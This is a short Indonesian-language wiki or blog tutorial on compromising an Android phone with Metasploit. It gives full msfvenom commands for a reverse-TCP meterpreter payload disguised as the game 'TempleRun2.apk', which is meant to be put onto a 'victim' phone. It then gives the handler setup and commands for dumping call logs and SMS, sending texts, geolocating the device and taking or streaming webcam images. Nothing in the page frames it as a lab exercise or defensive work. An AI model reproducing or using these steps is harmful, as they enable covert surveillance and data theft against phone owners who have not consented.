MSF: Hack Call Log, SMS, Camera

MSF: Hack Call Log, SMS, Camera Jump to navigationJump to search sumber: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit/ Membuat payload msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 > TempleRun2.apk apk file ada di /root/Desktop/TempleRun2.apk TempleRun2.apk perlu di masukan ke smartphone korban supaya kita bisa akses Di Kali Linux Kita perlu set listener, jalankan msfconsole Jalankan use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.0.102 set lport 4444 exploit Tunggu sambungan dari smartphone korban. Setelah tersambung ke korban Beberapa perintah menarik check_root cek apakah smartphone korban di root wlan_geolocate tampikan lokasi smartphone di Google maps dump_calllog download call log di file txt. ini akan tersimpan di /root/calllog_dump.txt dump_sms download SMS disimpan di txt file send_sms -d “nomor tujuan” -t “berita yang ingin dikirim” send_sms -d 9599***847 -t hacked kirim SMS webcam_list tampilan daftar semua webcam yang ada di smartphone korban webcam_snap 2 pilih webcam 2 webcam_stream streaming dari webcam Referensi • http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit/ Navigation menu • Log in • Page • Discussion • Read • View source • View history Search • Main page • Recent changes • Random page • Help about MediaWiki Tools • What links here • Related changes • Special pages • Printable version • Permanent link • Page information • This page was last edited on 22 April 2022, at 14:13.

Comments

Popular posts from this blog

Cara Masuk Ke Bios Pengaturan BIOS Pada Pc Windows

Panduan Cara Install Windows 11 dengan Flashdisk (Lengkap untuk Pemula)

MSF: Checking for open Ports with Nmap